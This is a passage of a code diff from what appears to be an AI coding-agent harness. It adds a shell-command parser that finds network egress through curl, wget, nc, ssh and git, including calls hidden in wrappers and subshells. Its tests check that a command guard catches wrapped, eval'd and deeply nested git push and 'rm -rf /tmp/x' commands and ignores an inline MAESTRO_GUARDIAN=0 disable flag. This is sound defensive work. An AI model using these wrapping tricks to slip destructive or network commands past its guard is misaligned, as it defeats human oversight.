`"${a.replace(/"/g, '\\"')}"`).join(" ")}`; - return executeGhCommand(`gh-repo-${params.action}`, cmd, signal); + return executeGhCommand(`gh-repo-${params.action}`, args, signal, sandbox); }, }); diff --git a/src/utils/url-extractor.ts b/src/utils/url-extractor.ts index 43171b0ee..dc92076ed 100644 --- a/src/utils/url-extractor.ts +++ b/src/utils/url-extractor.ts @@ -20,10 +20,1261 @@ const URL_PATTERN = /https?:\/\/[^\s"'<>]+/gi; /** - * Pattern to extract arguments from curl/wget commands. + * Commands that can initiate network egress from shell tool calls. */ -const CURL_WGET_PATTERN = - /(?:curl|wget)\s+((?:[^\s;&|<>`$()]|\\.)+(?:\s+(?:[^\s;&|<>`$()]|\\.)+)*)/gi; +const NETWORK_COMMANDS = new Set([ + "aria2c", + "curl", + "ftp", + "git", + "http", + "https", + "nc", + "ncat", + "netcat", + "sftp", + "ssh", + "telnet", + "wget", + "wget2", +]); + +const URL_POSITIONAL_COMMANDS = new Set([ + "aria2c", + "curl", + "http", + "https", + "wget", + "wget2", +]); + +const NETWORK_WRAPPER_COMMANDS = new Set([ + "busybox", + "command", + "doas", + "env", + "exec", + "nice", + "nohup", + "setsid", + "sudo", + "time", + "timeout", + "xargs", +]); + +const SHELL_WRAPPER_COMMANDS = new Set([ + "bash", + "dash", + "fish", + "ksh", + "mksh", + "sh", + "zsh", +]); + +const SHELL_FLAGS_WITH_VALUES = new Set([ + "--init-file", + "--rcfile", + "-rcfile", + "-o", + "+o", + "-O", + "+O", +]); +const SHELL_SHORT_FLAGS_BEFORE_COMMAND = new Set([ + "a", + "b", + "e", + "f", + "h", + "i", + "k", + "l", + "m", + "n", + "p", + "r", + "s", + "t", + "u", + "v", + "x", + "B", + "C", + "D", + "E", + "H", + "P", +]); +const EXEC_WRAPPER_FLAGS_WITH_VALUES = new Set(["-a"]); + +const NETWORK_GIT_SUBCOMMANDS = new Set([ + "archive", + "clone", + "config", + "fetch", + "ls-remote", + "pull", + "push", + "remote", + "submodule", +]); + +const GIT_NESTED_SUBCOMMAND_WRAPPERS = new Set(["lfs", "svn"]); + +const GIT_GLOBAL_FLAGS_WITH_VALUES = new Set([ + "-C", + "-c", + "--config-env", + "--exec-path", + "--git-dir", + "--namespace", + "--super-prefix", + "--work-tree", +]); + +const GIT_CLONE_FLAGS_WITH_VALUES = new Set([ + "-b", + "--branch", + "-c", + "--config", + "--bundle-uri", + "--depth", + "--filter", + "-j", + "--jobs", + "-o", + "--origin", + "--reference", + "--reference-if-able", + "--separate-git-dir", + "--server-option", + "--shallow-exclude", + "--shallow-since", + "--template", + "-u", + "--upload-pack", +]); + +const GIT_REMOTE_ADD_FLAGS_WITH_VALUES = new Set([ + "-m", + "--master", + "-t", + "--track", +]); + +const GIT_CONFIG_FLAGS_WITH_VALUES = new Set([ + "-f", + "--blob", + "--comment", + "--default", + "--file", + "--fixed-value", + "--type", + "--value", +]); + +const GIT_REMOTE_LOCAL_ACTIONS = new Set([ + "get-url", + "prune", + "remove", + "rename", + "rm", + "set-branches", + "set-head", +]); + +const GIT_SUBMODULE_ADD_FLAGS_WITH_VALUES = new Set([ + "-b", + "--branch", + "--depth", + "--name", + "--reference", +]); + +const GIT_SUBMODULE_LOCAL_ACTIONS = new Set([ + "absorbgitdirs", + "deinit", + "init", + "set-branch", + "status", + "summary", + "sync", +]); + +// Flags that take a value as the next argument. +const FLAGS_WITH_VALUES = new Set([ + "-X", + "--request", + "-o", + "-O", + "--output", + "-H", + "--header", + "-d", + "--data", + "--data-raw", + "--data-binary", + "--data-urlencode", + "-F", + "--form", + "-A", + "--user-agent", + "-u", + "--user", + "-T", + "--upload-file", + "-e", + "--referer", + "-b", + "--cookie", + "-c", + "--cookie-jar", + "-K", + "--config", + "--resolve", + "--connect-to", + "--max-time", + "-m", + "--retry", + "--retry-delay", + "-w", + "--write-out", + "-p", + "--port", + "-i", + "--identity-file", +]); + +const ENV_WRAPPER_FLAGS_WITH_VALUES = new Set(["-u", "--unset"]); + +const NICE_WRAPPER_FLAGS_WITH_VALUES = new Set(["-n", "--adjustment"]); + +const DOAS_WRAPPER_FLAGS_WITH_VALUES = new Set(["-C", "-u"]); + +const SUDO_WRAPPER_FLAGS_WITH_VALUES = new Set([ + "-C", + "--close-from", + "-g", + "--group", + "-h", + "--host", + "-p", + "--prompt", + "-T", + "--command-timeout", + "-u", + "--user", +]); + +const TIMEOUT_WRAPPER_FLAGS_WITH_VALUES = new Set([ + "-k", + "--kill-after", + "-s", + "--signal", +]); + +const XARGS_WRAPPER_FLAGS_WITH_VALUES = new Set([ + "-a", + "--arg-file", + "-d", + "--delimiter", + "-E", + "--eof", + "-e", + "--eof-str", + "-I", + "--replace", + "-i", + "-L", + "--max-lines", + "-l", + "-n", + "--max-args", + "-P", + "--max-procs", + "-s", + "--max-chars", +]); + +interface ShellToken { + value: string; + separator: boolean; +} + +function cleanExtractedUrl(url: string): string { + const trailingPunctuation = url.includes("://[") + ? /[)},.;:]+$/ + : /[)}\],.;:]+$/; + return url.replace(trailingPunctuation, ""); +} + +function shellCommandName(token: string): string { + const base = token.replace(/\\/g, "").split("/").pop() ?? token; + return base.toLowerCase(); +} + +function isEnvAssignment(token: string): boolean { + return /^[A-Za-z_][A-Za-z0-9_]*=/.test(token); +} + +function wrapperFlagTakesValue(commandName: string, flag: string): boolean { + if (commandName === "env") { + return ENV_WRAPPER_FLAGS_WITH_VALUES.has(flag); + } + if (commandName === "exec") { + return EXEC_WRAPPER_FLAGS_WITH_VALUES.has(flag); + } + if (commandName === "nice") { + return NICE_WRAPPER_FLAGS_WITH_VALUES.has(flag); + } + if (commandName === "doas") { + return DOAS_WRAPPER_FLAGS_WITH_VALUES.has(flag); + } + if (commandName === "sudo") { + return SUDO_WRAPPER_FLAGS_WITH_VALUES.has(flag); + } + if (commandName === "timeout") { + return TIMEOUT_WRAPPER_FLAGS_WITH_VALUES.has(flag); + } + if (commandName === "xargs") { + return XARGS_WRAPPER_FLAGS_WITH_VALUES.has(flag); + } + return false; +} + +function commandWrapperDoesNotExecute(segment: string[]): boolean { + if (shellCommandName(segment[0] ?? "") !== "command") { + return false; + } + + for (let index = 1; index < segment.length; index += 1) { + const arg = segment[index]!; + if (arg === "--") { + return false; + } + if (!arg.startsWith("-") || arg === "-") { + return false; + } + if (arg === "-v" || arg === "-V") { + return true; + } + if (!arg.startsWith("--") && /[vV]/.test(arg.slice(1))) { + return true; + } + } + + return false; +} + +function tokenizeShellCommand(command: string): ShellToken[] { + const tokens: ShellToken[] = []; + let current = ""; + let quote: "'" | '"' | null = null; + let escaped = false; + + const pushCurrent = () => { + if (current.length > 0) { + tokens.push({ value: current, separator: false }); + current = ""; + } + }; + + for (let index = 0; index < command.length; index += 1) { + const char = command[index]!; + + if (escaped) { + current += char; + escaped = false; + continue; + } + + if (char === "\\") { + escaped = true; + continue; + } + + if (quote) { + if (char === quote) { + quote = null; + } else { + current += char; + } + continue; + } + + if (char === "'" || char === '"') { + quote = char; + continue; + } + + if (/\s/.test(char)) { + pushCurrent(); + continue; + } + + if (char === ";" || char === "&" || char === "|") { + pushCurrent(); + const next = command[index + 1]; + if ((char === "&" || char === "|") && next === char) { + tokens.push({ value: `${char}${next}`, separator: true }); + index += 1; + } else { + tokens.push({ value: char, separator: true }); + } + continue; + } + + current += char; + } + + if (escaped) { + current += "\\"; + } + pushCurrent(); + + return tokens; +} + +function commandSegments(tokens: ShellToken[]): string[][] { + const segments: string[][] = []; + let current: string[] = []; + + for (const token of tokens) { + if (token.separator) { + if (current.length > 0) { + segments.push(current); + current = []; + } + continue; + } + current.push(token.value); + } + + if (current.length > 0) { + segments.push(current); + } + + return segments; +} + +function skipWrapperArgs(segment: string[], commandName: string): string[] { + let index = 1; + while (index < segment.length) { + const arg = segment[index]!; + if (arg === "--") { + index += 1; + break; + } + if (commandName === "env" && isEnvAssignment(arg)) { + index += 1; + continue; + } + if (!arg.startsWith("-")) { + break; + } + const [flag] = arg.split("=", 1); + index += 1; + if ( + flag && + wrapperFlagTakesValue(commandName, flag) && + !arg.includes("=") && + index < segment.length + ) { + index += 1; + } + } + + if (commandName === "timeout" && index < segment.length) { + index += 1; + } + + return segment.slice(index); +} + +function extractShellCommandString(segment: string[]): string | null { + for (let index = 1; index < segment.length; index += 1) { + const arg = segment[index]!; + if (arg === "--") { + return null; + } + if (arg === "--command") { + return segment[index + 1] ?? null; + } + if (arg.startsWith("--command=")) { + return arg.slice("--command=".length) || null; + } + if (SHELL_FLAGS_WITH_VALUES.has(arg)) { + index += 1; + continue; + } + if ( + arg.startsWith("--init-file=") || + arg.startsWith("--rcfile=") || + arg.startsWith("-rcfile=") + ) { + continue; + } + if (!arg.startsWith("-")) { + return null; + } + if (!arg.startsWith("--")) { + const commandFlagIndex = arg.indexOf("c", 1); + if ( + commandFlagIndex !== -1 && + commandFlagIndex <= 5 && + [...arg.slice(1, commandFlagIndex)].every((flag) => + SHELL_SHORT_FLAGS_BEFORE_COMMAND.has(flag), + ) + ) { + const gluedCommand = arg.slice(commandFlagIndex + 1); + return gluedCommand.length > 1 + ? gluedCommand + : (segment[index + 1] ?? null); + } + } + } + + return null; +} + +function extractNestedShellCommand(segment: string[]): string | null { + let remaining = segment; + + while (remaining.length > 0) { + const commandName = shellCommandName(remaining[0] ?? ""); + if (SHELL_WRAPPER_COMMANDS.has(commandName)) { + return extractShellCommandString(remaining); + } + + if (!NETWORK_WRAPPER_COMMANDS.has(commandName)) { + return null; + } + + if (commandWrapperDoesNotExecute(remaining)) { + return null; + } + + remaining = skipWrapperArgs(remaining, commandName); + } + + return null; +} + +function findParenthesizedCommandEnd( + command: string, + startIndex: number, + startOffset = 1, +): number { + let depth = 1; + let quote: "'" | '"' | null = null; + let escaped = false; + + for ( + let index = startIndex + startOffset; + index < command.length; + index += 1 + ) { + const char = command[index]!; + + if (escaped) { + escaped = false; + continue; + } + + if (char === "\\") { + escaped = true; + continue; + } + + if (quote === "'") { + if (char === "'") { + quote = null; + } + continue; + } + + if (quote === '"') { + if (char === '"') { + quote = null; + continue; + } + if ( + char === "$" && + command[index + 1] === "(" && + command[index + 2] !== "(" + ) { + depth += 1; + index += 1; + } + continue; + } + + if (char === "'" || char === '"') { + quote = char; + continue; + } + + if ( + char === "$" && + command[index + 1] === "(" && + command[index + 2] !== "(" + ) { + depth += 1; + index += 1; + continue; + } + + if (char === "(") { + depth += 1; + continue; + } + + if (char === ")") { + depth -= 1; + if (depth === 0) { + return index; + } + } + } + + return -1; +} + +function findCommandSubstitutionEnd( + command: string, + startIndex: number, +): number { + return findParenthesizedCommandEnd(command, startIndex, 2); +} + +function extractSubshellCommands(command: string): string[] { + const commands: string[] = []; + let quote: "'" | '"' | null = null; + let escaped = false; + + const startsAfterShellBoundary = (index: number): boolean => { + for (let current = index - 1; current >= 0; current -= 1) { + const value = command[current]; + if (value === "\n" || value === "\r") { + return true; + } + if (value && !/\s/.test(value)) { + return value === ";" || value === "&" || value === "|" || value === "("; + } + } + return true; + }; + + for (let index = 0; index < command.length; index += 1) { + const char = command[index]!; + + if (escaped) { + escaped = false; + continue; + } + + if (char === "\\") { + escaped = true; + continue; + } + + if (quote === "'") { + if (char === "'") { + quote = null; + } + continue; + } + + if (quote === '"') { + if (char === '"') { + quote = null; + } + continue; + } + + if (char === "'" || char === '"') { + quote = char; + continue; + } + + const isProcessSubstitution = + command[index - 1] === "<" || command[index - 1] === ">"; + if ( + char === "(" && + command[index - 1] !== "$" && + command[index + 1] !== "(" && + (isProcessSubstitution || startsAfterShellBoundary(index)) + ) { + const endIndex = findParenthesizedCommandEnd(command, index); + if (endIndex !== -1) { + const nested = command.slice(index + 1, endIndex).trim(); + if (nested) { + commands.push(nested); + } + index = endIndex; + } + } + } + + return commands; +} + +function extractFindExecSegments(segment: string[]): string[][] { + const commands: string[][] = []; + + for (let index = 1; index < segment.length; index += 1) { + const arg = segment[index]!; + if ( + arg !== "-exec" && + arg !== "-execdir" && + arg !== "-ok" && + arg !== "-okdir" + ) { + continue; + } + + const start = index + 1; + let end = start; + while (end < segment.length) { + const token = segment[end]!; + if (token === ";" || token === "+") { + break; + } + end += 1; + } + + if (end > start) { + commands.push(segment.slice(start, end)); + } + index = end; + } + + return commands; +} + +function extractEmbeddedCommandSegments(segment: string[]): string[][] { + let remaining = segment; + + while (remaining.length > 0) { + const commandName = shellCommandName(remaining[0] ?? ""); + if (commandName === "find") { + return extractFindExecSegments(remaining); + } + if (!NETWORK_WRAPPER_COMMANDS.has(commandName)) { + return []; + } + if (commandWrapperDoesNotExecute(remaining)) { + return []; + } + remaining = skipWrapperArgs(remaining, commandName); + } + + return []; +} + +function nestedCommandSegments( + segment: string[], + seen: Set, +): string[][] { + const segments: string[][] = []; + const nestedShell = extractNestedShellCommand(segment); + if (nestedShell) { + segments.push(...allCommandSegments(nestedShell, seen)); + } + + for (const embeddedSegment of extractEmbeddedCommandSegments(segment)) { + segments.push( + embeddedSegment, + ...nestedCommandSegments(embeddedSegment, seen), + ); + } + + return segments; +} + +function extractCommandSubstitutionCommands(command: string): string[] { + const commands: string[] = []; + let quote: "'" | '"' | null = null; + let escaped = false; + + for (let index = 0; index < command.length; index += 1) { + const char = command[index]!; + + if (escaped) { + escaped = false; + continue; + } + + if (char === "\\") { + escaped = true; + continue; + } + + if (quote === "'") { + if (char === "'") { + quote = null; + } + continue; + } + + if (quote === '"') { + if (char === '"') { + quote = null; + continue; + } + if ( + char === "$" && + command[index + 1] === "(" && + command[index + 2] !== "(" + ) { + const endIndex = findCommandSubstitutionEnd(command, index); + if (endIndex !== -1) { + const nested = command.slice(index + 2, endIndex).trim(); + if (nested) { + commands.push(nested); + } + index = endIndex; + } + } + if (char === "`") { + const endIndex = command.indexOf("`", index + 1); + if (endIndex !== -1) { + const nested = command.slice(index + 1, endIndex).trim(); + if (nested) { + commands.push(nested); + } + index = endIndex; + } + } + continue; + } + + if (char === "'" || char === '"') { + quote = char; + continue; + } + + if ( + char === "$" && + command[index + 1] === "(" && + command[index + 2] !== "(" + ) { + const endIndex = findCommandSubstitutionEnd(command, index); + if (endIndex !== -1) { + const nested = command.slice(index + 2, endIndex).trim(); + if (nested) { + commands.push(nested); + } + index = endIndex; + } + continue; + } + + if (char === "`") { + const endIndex = command.indexOf("`", index + 1); + if (endIndex !== -1) { + const nested = command.slice(index + 1, endIndex).trim(); + if (nested) { + commands.push(nested); + } + index = endIndex; + } + } + } + + return commands; +} + +function allCommandSegments( + command: string, + seen = new Set(), +): string[][] { + if (seen.has(command)) { + return []; + } + seen.add(command); + + const segments = commandSegments(tokenizeShellCommand(command)); + const nestedSegments = segments.flatMap((segment) => + nestedCommandSegments(segment, seen), + ); + const substitutionSegments = extractCommandSubstitutionCommands( + command, + ).flatMap((nested) => allCommandSegments(nested, seen)); + const subshellSegments = extractSubshellCommands(command).flatMap((nested) => + allCommandSegments(nested, seen), + ); + + return [ + ...segments, + ...nestedSegments, + ...substitutionSegments, + ...subshellSegments, + ]; +} + +function unwrapNetworkInvocation( + segment: string[], +): { commandName: string; args: string[]; display: string[] } | null { + let remaining = segment; + + while (remaining.length > 0) { + const commandName = shellCommandName(remaining[0] ?? ""); + if (NETWORK_COMMANDS.has(commandName)) { + return { + commandName, + args: remaining.slice(1), + display: remaining, + }; + } + + if (!NETWORK_WRAPPER_COMMANDS.has(commandName)) { + return null; + } + + if (commandWrapperDoesNotExecute(remaining)) { + return null; + } + + remaining = skipWrapperArgs(remaining, commandName); + } + + return null; +} + +function looksLikeHostTarget(value: string): boolean { + if (!value || value.startsWith("-")) { + return false; + } + if (/^https?:\/\//i.test(value)) { + return true; + } + if (/^\[[0-9a-f:.%]+\](?::\d+)?(?:\/.*)?$/i.test(value)) { + return true; + } + if (/^(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?(?:\/.*)?$/.test(value)) { + return true; + } + if (/^localhost(?::\d+)?(?:\/.*)?$/i.test(value)) { + return true; + } + if (/^[a-z0-9.-]+\.[a-z0-9-]+(?::\d+)?(?:\/.*)?$/i.test(value)) { + return true; + } + if (/^[^@\s]+@[a-z0-9.-]+\.[a-z0-9-]+(?::[^\s]+|\/.*)?$/i.test(value)) { + return true; + } + return false; +} + +function targetToUrl(value: string): string | null { + let target = value.trim().replace(/^["']|["']$/g, ""); + if (!looksLikeHostTarget(target)) { + return null; + } + + const scpStyleMatch = target.match(/^[^@\s]+@([^:/\s]+):/); + if (scpStyleMatch?.[1]) { + target = scpStyleMatch[1]; + } else { + const sshUserHostMatch = target.match( + /^[^@\s]+@([^:/\s]+)((?::\d+)?(?:\/.*)?)$/i, + ); + if (sshUserHostMatch?.[1]) { + target = `${sshUserHostMatch[1]}${sshUserHostMatch[2] ?? ""}`; + } + } + + if (!/^https?:\/\//i.test(target)) { + target = `http://${target}`; + } + + return cleanExtractedUrl(target); +} + +function isLocalGitTarget(value: string): boolean { + const target = value.trim().replace(/^["']|["']$/g, ""); + return ( + target === "." || + target === ".." || + target.startsWith("./") || + target.startsWith("../") || + target.startsWith("/") || + target.startsWith("~/") || + target.startsWith("file://") + ); +} + +function hasShellExpansion(value: string): boolean { + return /[$`]|[<>]\(/.test(value); +} + +function networkFlagTakesValue(commandName: string, flag: string): boolean { + if (commandName === "curl" && (flag === "-i" || flag === "-p")) { + return false; + } + + return FLAGS_WITH_VALUES.has(flag); +} + +function nonFlagArgs(commandName: string, args: string[]): string[] { + const values: string[] = []; + let skipNext = false; + + for (const arg of args) { + if (skipNext) { + skipNext = false; + continue; + } + + if (arg.startsWith("-")) { + if (!arg.includes("=") && networkFlagTakesValue(commandName, arg)) { + skipNext = true; + } + continue; + } + + values.push(arg); + } + + return values; +} + +function gitCloneNonFlagArgs(args: string[]): string[] { + return gitNonFlagArgs(args, GIT_CLONE_FLAGS_WITH_VALUES); +} + +function gitNonFlagArgs( + args: string[], + flagsWithValues: Set, +): string[] { + const values: string[] = []; + let skipNext = false; + let optionsEnded = false; + + for (const arg of args) { + if (skipNext) { + skipNext = false; + continue; + } + + if (!optionsEnded && arg === "--") { + optionsEnded = true; + continue; + } + + if (!optionsEnded && arg.startsWith("-")) { + const [flag] = arg.split("=", 1); + if (flag && flagsWithValues.has(flag) && !arg.includes("=")) { + skipNext = true; + } + continue; + } + + values.push(arg); + } + + return values; +} + +function gitRemoteTargetArgs(args: string[]): string[] { + const targets = gitNonFlagArgs(args, GIT_REMOTE_ADD_FLAGS_WITH_VALUES); + const action = targets[0]?.toLowerCase(); + if (action === "add") { + return targets.slice(2, 3); + } + if (action === "set-url") { + return targets.slice(2); + } + if (action && !GIT_REMOTE_LOCAL_ACTIONS.has(action)) { + return targets.slice(0, 1); + } + return []; +} + +function gitConfigTargetArgs(args: string[]): string[] { + const targets = gitNonFlagArgs(args, GIT_CONFIG_FLAGS_WITH_VALUES); + const key = targets[0]; + if (!key || targets.length < 2) { + return []; + } + + const rewriteTarget = key.match( + /^url\.(.+)\.(?:insteadof|pushinsteadof)$/i, + )?.[1]; + if (rewriteTarget) { + return [rewriteTarget]; + } + + if ( + /^remote\..+\.(?:push)?url$/i.test(key) || + /^submodule\..+\.url$/i.test(key) + ) { + return targets.slice(1, 2); + } + + return []; +} + +function gitConfigCommandIsLocal(args: string[]): boolean { + return gitConfigTargetArgs(args).length === 0; +} + +function gitRemoteCommandIsLocal(args: string[]): boolean { + const targets = gitNonFlagArgs(args, GIT_REMOTE_ADD_FLAGS_WITH_VALUES); + const action = targets[0]?.toLowerCase(); + if (!action || GIT_REMOTE_LOCAL_ACTIONS.has(action)) { + return true; + } + if (action === "add") { + return targets.length < 3; + } + if (action === "set-url") { + return targets.length < 3; + } + return false; +} + +function gitSubmoduleTargetArgs(args: string[]): string[] { + const targets = gitNonFlagArgs(args, GIT_SUBMODULE_ADD_FLAGS_WITH_VALUES); + const action = targets[0]?.toLowerCase(); + if (!action || GIT_SUBMODULE_LOCAL_ACTIONS.has(action)) { + return []; + } + if (action === "add") { + return targets.slice(1, 2); + } + return targets.slice(0, 1); +} + +function gitSubmoduleCommandIsLocal(args: string[]): boolean { + const targets = gitNonFlagArgs(args, GIT_SUBMODULE_ADD_FLAGS_WITH_VALUES); + const action = targets[0]?.toLowerCase(); + return !action || GIT_SUBMODULE_LOCAL_ACTIONS.has(action); +} + +function gitArchiveTargetArgs(args: string[]): string[] { + const targets: string[] = []; + + for (let index = 0; index < args.length; index += 1) { + const arg = args[index]!; + if (arg === "--remote" && index + 1 < args.length) { + targets.push(args[index + 1]!); + index += 1; + continue; + } + if (arg.startsWith("--remote=")) { + const target = arg.slice("--remote=".length); + if (target) { + targets.push(target); + } + } + } + + return targets; +} + +function networkTargetArgs( + commandName: string, + args: string[], + gitSubcommand: string | null, +): string[] { + const targets = + commandName === "git" && gitSubcommand === "clone" + ? gitCloneNonFlagArgs(args) + : nonFlagArgs(commandName, args); + + if (commandName === "git") { + if (gitSubcommand === "archive") { + return gitArchiveTargetArgs(args); + } + if (gitSubcommand === "config") { + return gitConfigTargetArgs(args); + } + if (gitSubcommand === "remote") { + return gitRemoteTargetArgs(args); + } + if (gitSubcommand === "submodule") { + return gitSubmoduleTargetArgs(args); + } + return targets.slice(0, 1); + } + + if ( + commandName === "nc" || + commandName === "ncat" || + commandName === "netcat" || + commandName === "ssh" || + commandName === "sftp" || + commandName === "telnet" || + commandName === "ftp" + ) { + return targets.slice(0, 1); + } + + return targets; +} + +function nextGitSubcommandToken( + args: string[], +): { subcommand: string; args: string[] } | null { + for (let index = 0; index < args.length; index += 1) { + const arg = args[index]!; + if (arg === "--") { + continue; + } + + const [flag] = arg.split("=", 1); + if ( + flag && + GIT_GLOBAL_FLAGS_WITH_VALUES.has(flag) && + !arg.includes("=") && + index + 1 < args.length + ) { + index += 1; + continue; + } + if (arg.startsWith("-c") && arg !== "-c") { + continue; + } + if (arg.startsWith("--")) { + continue; + } + if (arg.startsWith("-")) { + continue; + } + + const subcommand = arg.toLowerCase(); + return { subcommand, args: args.slice(index + 1) }; + } + + return null; +} + +function gitSubcommandInvocation( + args: string[], +): { subcommand: string; args: string[] } | null { + const invocation = nextGitSubcommandToken(args); + if (!invocation) { + return null; + } + + if (NETWORK_GIT_SUBCOMMANDS.has(invocation.subcommand)) { + return invocation; + } + + if (!GIT_NESTED_SUBCOMMAND_WRAPPERS.has(invocation.subcommand)) { + return null; + } + + const nestedInvocation = nextGitSubcommandToken(invocation.args); + return nestedInvocation && + NETWORK_GIT_SUBCOMMANDS.has(nestedInvocation.subcommand) + ? nestedInvocation + : null; +} /** * Extract URLs from any value recursively. @@ -50,7 +1301,7 @@ export function extractUrlsFromValue(value: unknown): string[] { if (matches) { for (const match of matches) { // Trim common trailing punctuation that gets captured - urls.push(match.replace(/[)}\],.;:]+$/, "")); + urls.push(cleanExtractedUrl(match)); } } } else if (Array.isArray(val)) { @@ -90,87 +1341,96 @@ export function extractUrlsFromValue(value: unknown): string[] { export function extractUrlsFromShellCommand(command: string): string[] { const urls: string[] = []; - // Flags that take a value as the next argument - const FLAGS_WITH_VALUES = new Set([ - "-X", - "--request", - "-o", - "-O", - "--output", - "-H", - "--header", - "-d", - "--data", - "--data-raw", - "--data-binary", - "--data-urlencode", - "-F", - "--form", - "-A", - "--user-agent", - "-u", - "--user", - "-T", - "--upload-file", - "-e", - "--referer", - "-b", - "--cookie", - "-c", - "--cookie-jar", - "-K", - "--config", - "--resolve", - "--connect-to", - "--max-time", - "-m", - "--retry", - "--retry-delay", - "-w", - "--write-out", - ]); - - const matches = command.matchAll(new RegExp(CURL_WGET_PATTERN)); - for (const match of matches) { - const argsStr = match[1]; - if (!argsStr) continue; - // Split by spaces, respecting quotes - const argParts = argsStr.match(/(?:[^\s"']+|"[^"]*"|'[^']*')+/g) || []; - - let skipNext = false; - for (const arg of argParts) { - const stripped = arg.replace(/^["']|["']$/g, ""); // strip quotes - - // Skip flag values (arg after a flag that takes a value) - if (skipNext) { - skipNext = false; + for (const segment of allCommandSegments(command)) { + const invocation = unwrapNetworkInvocation(segment); + if (!invocation) { + continue; + } + + let args = invocation.args; + let gitSubcommand: string | null = null; + if (invocation.commandName === "git") { + const gitInvocation = gitSubcommandInvocation(args); + if (!gitInvocation) { continue; } + args = gitInvocation.args; + gitSubcommand = gitInvocation.subcommand; + } - // Skip flags, but check if they take a value - if (stripped.startsWith("-")) { - // Handle both --flag=value and --flag value forms - if (stripped.includes("=")) { - // Flag with embedded value like --output=file.txt, skip entirely - continue; - } - if (FLAGS_WITH_VALUES.has(stripped)) { - skipNext = true; - } + for (const arg of networkTargetArgs( + invocation.commandName, + args, + gitSubcommand, + )) { + const url = targetToUrl(arg); + if (url) { + urls.push(url); + } + } + } + + return [...new Set(urls)]; +} + +export function findOpaqueNetworkShellCommand(command: string): string | null { + for (const segment of allCommandSegments(command)) { + const invocation = unwrapNetworkInvocation(segment); + if (!invocation) { + continue; + } + + let args = invocation.args; + let gitSubcommand: string | null = null; + if (invocation.commandName === "git") { + const gitInvocation = gitSubcommandInvocation(args); + if (!gitInvocation) { continue; } + args = gitInvocation.args; + gitSubcommand = gitInvocation.subcommand; + } + + const targets = networkTargetArgs( + invocation.commandName, + args, + gitSubcommand, + ); + if ( + targets.length === 0 && + invocation.commandName === "git" && + (gitSubcommand === "archive" || + (gitSubcommand === "config" && gitConfigCommandIsLocal(args)) || + (gitSubcommand === "remote" && gitRemoteCommandIsLocal(args)) || + (gitSubcommand === "submodule" && gitSubmoduleCommandIsLocal(args))) + ) { + continue; + } - // Add http:// if no protocol specified (skip whitespace-only to avoid "http://") - let url = stripped?.trim() ?? ""; - if (!url) continue; - if (!/^https?:\/\//i.test(url)) { - url = `http://${url}`; + if (targets.length > 0) { + if ( + URL_POSITIONAL_COMMANDS.has(invocation.commandName) && + targets.some((arg) => targetToUrl(arg)) && + targets.every((arg) => targetToUrl(arg) || !hasShellExpansion(arg)) + ) { + continue; + } + + const allTargetsAreStatic = targets.every((arg) => { + if (targetToUrl(arg)) { + return true; + } + return invocation.commandName === "git" && isLocalGitTarget(arg); + }); + if (allTargetsAreStatic) { + continue; } - urls.push(url.replace(/[)}\],.;:]+$/, "")); } + + return invocation.display.join(" "); } - return urls; + return null; } /** diff --git a/test/guardian/guardian-runner.test.ts b/test/guardian/guardian-runner.test.ts index 0d300c8b3..99189120b 100644 --- a/test/guardian/guardian-runner.test.ts +++ b/test/guardian/guardian-runner.test.ts @@ -96,15 +96,199 @@ describe("guardian runner", () => { Reflect.deleteProperty(process.env, "MAESTRO_GUARDIAN"); }); - it("respects inline disable flag for commit/push detection", () => { - const result = shouldGuardCommand('MAESTRO_GUARDIAN=0 git commit -m "msg"'); - expect(result.shouldGuard).toBe(false); + it("ignores inline disable text for commit/push detection", () => { + const commented = shouldGuardCommand( + "git push origin main # MAESTRO_GUARDIAN=0", + ); + expect(commented.shouldGuard).toBe(true); + expect(commented.trigger).toBe("git push"); + + const assignment = shouldGuardCommand( + 'MAESTRO_GUARDIAN=0 git commit -m "msg"', + ); + expect(assignment.shouldGuard).toBe(true); + expect(assignment.trigger).toBe("git commit"); + }); + + it("detects wrapped git commands", () => { + const cases = [ + { command: "git -C packages/tui-rs push", trigger: "git push" }, + { command: "command git push origin main", trigger: "git push" }, + { command: 'command -- git commit -m "msg"', trigger: "git commit" }, + { command: 'sudo -- git commit -m "msg"', trigger: "git commit" }, + { command: "sudo -u root -- git push origin main", trigger: "git push" }, + { command: "/usr/bin/git push origin main", trigger: "git push" }, + { command: '( git commit -m "msg" )', trigger: "git commit" }, + { command: 'echo "$(git commit -m msg)"', trigger: "git commit" }, + { command: "echo $(git push origin main)", trigger: "git push" }, + { command: "echo `git push origin main`", trigger: "git push" }, + { command: "cat <(git push origin main)", trigger: "git push" }, + { command: "diff <(echo ok) <(rm -rf /tmp/x)", trigger: "rm -rf" }, + { command: "echo $(rm -rf /tmp/x)", trigger: "rm -rf" }, + { command: "echo `rm -r /tmp/x`", trigger: "rm -r" }, + { command: "echo $(echo $(git push origin main))", trigger: "git push" }, + { command: "echo $(echo $(rm -rf /tmp/x))", trigger: "rm -rf" }, + { command: "eval 'git push origin main'", trigger: "git push" }, + { command: 'eval "rm -rf /tmp/x"', trigger: "rm -rf" }, + { + command: 'env GIT_CONFIG_GLOBAL=/tmp/gitconfig git commit -m "msg"', + trigger: "git commit", + }, + ]; + + for (const { command, trigger } of cases) { + const result = shouldGuardCommand(command); + expect(result.shouldGuard).toBe(true); + expect(result.trigger).toBe(trigger); + } + }); + + it("detects guarded commands past shallow substitution nesting", () => { + let gitCommand = "git push origin main"; + let rmCommand = "rm -rf /tmp/x"; + for (let index = 0; index < 12; index += 1) { + gitCommand = `echo $(${gitCommand})`; + rmCommand = `echo $(${rmCommand})`; + } + + expect(shouldGuardCommand(gitCommand)).toEqual({ + shouldGuard: true, + trigger: "git push", + }); + expect(shouldGuardCommand(rmCommand)).toEqual({ + shouldGuard: true, + trigger: "rm -rf", + }); + }); + + it("detects later guarded git commands in a token sequence", () => { + const cases = [ + { + command: "git submodule foreach git commit -m update", + trigger: "git commit", + }, + { + command: `sh -c 'git status +git commit -m "msg"'`, + trigger: "git commit", + }, + ]; + + for (const { command, trigger } of cases) { + const result = shouldGuardCommand(command); + expect(result.shouldGuard).toBe(true); + expect(result.trigger).toBe(trigger); + } + }); + + it("detects guarded commands inside shell -c scripts", () => { + const cases = [ + { command: `sh -c 'git commit -m "msg"'`, trigger: "git commit" }, + { command: `sh -c'git push origin main'`, trigger: "git push" }, + { command: `sh.exe -c 'git push origin main'`, trigger: "git push" }, + { command: `bash -lc 'git push origin main'`, trigger: "git push" }, + { command: `bash -lc'git push origin main'`, trigger: "git push" }, + { command: `fish -c 'git push origin main'`, trigger: "git push" }, + { + 